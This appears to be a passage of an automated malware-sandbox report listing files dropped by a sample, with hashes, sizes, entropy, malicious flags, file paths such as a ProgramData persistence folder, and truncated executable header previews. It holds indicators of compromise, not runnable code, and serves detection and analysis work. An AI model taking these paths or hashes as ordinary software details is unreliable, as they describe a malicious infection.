                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L......e.........."..........P......w.............@..........................`............@...@.......@.....................d...|....@...........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):51200
                                                                                                                                                                                  Entropy (8bit):0.8745947603342119
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                  Entropy (8bit):1.136471148832945
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1755136
                                                                                                                                                                                  Entropy (8bit):7.944061716574701
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:4+5L+Qg75yHWPUqbVpWlBRd1jcOHmf0FqSoYR2DPoWq:4+dFHWPS/Rd1IY4hoV
                                                                                                                                                                                  MD5:FA2940984475E3DD89E37F15DBE8A88F
                                                                                                                                                                                  SHA1:C7CFA3A0F500441CE22EF72BBD9BE7988F07C4D3
                                                                                                                                                                                  SHA-256:04BA7F7A64595085447F1D659F91D98693E53333F323EC7826A0E0D03918B626
                                                                                                                                                                                  SHA-512:C30C965067519BF3B172362AA5DF510FE867CAFE14BED875049F984B18018801119BD334B4ED49ED63E93D11F2A4C8D2397024D41328471E842445497B43F49C
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....$e.........."...0..$............E.. ...`....@.. ........................F.....}H....`.................................m........`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........6..............@... ..*..........8..............@...odmizeae.....@+......:..............@...wjrksujl. ....E.....................@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:modified
                                                                                                                                                                                  Size (bytes):2399744
                                                                                                                                                                                  Entropy (8bit):7.962349167063599
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:nBeLY5wqsk2vUnzPT7uc1eb0MmZEazB2XP3Oxc1tHTf:wIt0vcrT7ucAvm90fG
                                                                                                                                                                                  MD5:0EC84D886E773CBA442A61606DF14F06
                                                                                                                                                                                  SHA1:404EFBEAE6B921DCFC1FBE5B90EE47E5FB7B8038
                                                                                                                                                                                  SHA-256:B29798AA1B8E46207A37CCD73613B87BC8F2A6D50774D0079CF7AB341B1EBB3D
                                                                                                                                                                                  SHA-512:5C026CDC1752F026D37AF3619E78565EDC8896DA35D65B373042D200A7C95003518B01D825B5101CD013F7F142505B5F1328D177202C3F76489C1BF787238A52
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..........PE..L......e...............".....V........\...........@...........................\.....}.$...@.................................W...k....`...C.......................................................................................................... . .P..........................@....rsrc....C...`......................@....idata ............................@... ..-.........................@...gakjennq.p...@A..j..................@...brsozmps......\......x$.............@....taggant.0....\.."...|$.............@...................................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1166336
                                                                                                                                                                                  Entropy (8bit):7.03555490248727
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:NqDEvCTbMWu7rQYlBQcBiT6rprG8aSe2+b+HdiJUC:NTvC/MTQYxsWR7aSe2+b+HoJU
                                                                                                                                                                                  MD5:BA8A470327E60DD9B1CC33B37B5FA8B7
                                                                                                                                                                                  SHA1:2B540D9587B66C173834093045604CF42AEFDCD6
                                                                                                                                                                                  SHA-256:7080E78161D06FED8CD87E3CF5F3B087C15F5E07561FC413F65D86FE73529A46
                                                                                                                                                                                  SHA-512:F9BC2346917751B2AED22E4B9810539513431FC5B70A2BAB0054C2C6831C9C8EF8B06453749E57E6F52BF66C083C457F39231E3B57BB6BA93B7096DBD44E4FA0
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L......e..........".................w.............@..........................0.......*....@...@.......@.....................d...|....@..xa.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...xa...@...b..................@..@.reloc...u.......v...V..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1882112
                                                                                                                                                                                  Entropy (8bit):7.949517224812261
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:wLi2wNaeFSEYrdH8UesU02hUv21QLUmRa2obb:oHnDEYrPW0cUvCmz+b
                                                                                                                                                                                  MD5:2C4C8C25D448625A0184403CA56EDB2D
                                                                                                                                                                                  SHA1:61531D43B5ADE8F66FD2409DF1A20902EF1A781E
                                                                                                                                                                                  SHA-256:01024AF50DDAF78F4F6A96B4E537400D4572A47E60CCF542F9EE6771DCDBAC0F
                                                                                                                                                                                  SHA-512:CCF51E10D1AAE0F669B771669F67500E1B7EE712A5078B947D256B57E722244F11F01B018820C4B53D1069137F5F4859E3353D8BE601F4E80AC1ECF939F30368
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*R..n3.@n3.@n3.@5[.A`3.@5[.A.3.@.^.A|3.@.^.Az3.@.^.A.3.@5[.Az3.@5[.A}3.@n3.@.3.@.].Ao3.@.]u@o3.@.].Ao3.@Richn3.@........................PE..L......e.............................@J...........@..........................pJ.....6.....@.................................Vp..j....`........................J...............................J..................................................... . .P..........................@....rsrc........`......................@....idata .....p......................@... ..*.........................@...tfywulqz......0.....................@...prpgnkkw.....0J.....................@....taggant.0...@J.."..................@...................................................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                  Entropy (8bit):0.8508558324143882
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):3001856
                                                                                                                                                                                  Entropy (8bit):7.9902601078319515
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:49152:fBAdrMlL5e9wo9gMj0rnjBzhDqRBsFhU186LnFrq/OdncDhIYaMFEFT:KtJwogMYDll+R6FhtYdEwnW+YaMFqT
                                                                                                                                                                                  MD5:A19B05B874E77B99515C397C5DE13F48
                                                                                                                                                                                  SHA1:6996028DDF12116E8BB0FBCD5FA693DE0E14B78A
                                                                                                                                                                                  SHA-256:C6DC8E17A1D4A1545A12027D8FB15A2C625CE3781CD2062976861CEBAAE37A9A
                                                                                                                                                                                  SHA-512:4E0B6AA347062911D76DD6C6D575FD82CFA7F2C8C0A308967E77DC1ABDA2C7E14DFD0942869BDDD59E800359490FD2FC1AF08FFCD466428347473E20136001A4
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):739328
                                                                                                                                                                                  Entropy (8bit):7.979896185184989
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:IINqBfLfGjui+14ljDuNbRdjc3dEEwq4FDLk2ldHU3nhR1JPHVQPInKIkTMZ+kur:I0Beb/c3d5wqsk2vQnnzKITZlucg
                                                                                                                                                                                  MD5:28EF40F53C38FDF1211F174563BB532C
                                                                                                                                                                                  SHA1:123AABE3254B8BB0EEDBEB03AB5C89F461B120EB
                                                                                                                                                                                  SHA-256:008870E652BE38FC6EC9D8DDE344BB9B70E3409879E02E1E09397D8060D859AE
                                                                                                                                                                                  SHA-512:EF64FA7DE06D5C2242D7B164A49282B34104D05C0828CCF228E598E1886E5A19FEF5D637F480BB58E8CCEB35CF28A26AF008CE7C543E3F4C5EF705C8C68F709D
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                  Entropy (8bit):0.6732424250451717
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                  Entropy (8bit):1.136471148832945
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                                  Entropy (8bit):0.0357803477377646
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                                                  MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                                                  SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                                                  SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                                                  SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1882112
                                                                                                                                                                                  Entropy (8bit):7.949517224812261
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:wLi2wNaeFSEYrdH8UesU02hUv21QLUmRa2obb:oHnDEYrPW0cUvCmz+b
                                                                                                                                                                                  MD5:2C4C8C25D448625A0184403CA56EDB2D
                                                                                                                                                                                  SHA1:61531D43B5ADE8F66FD2409DF1A20902EF1A781E
                                                                                                                                                                                  SHA-256:01024AF50DDAF78F4F6A96B4E537400D4572A47E60CCF542F9EE6771DCDBAC0F
                                                                                                                                                                                  SHA-512:CCF51E10D1AAE0F669B771669F67500E1B7EE712A5078B947D256B57E722244F11F01B018820C4B53D1069137F5F4859E3353D8BE601F4E80AC1ECF939F30368
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                  Entropy (8bit):1.136471148832945
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                                  Entropy (8bit):0.0357803477377646
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                                                  MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                                                  SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                                                  SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                                                  SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
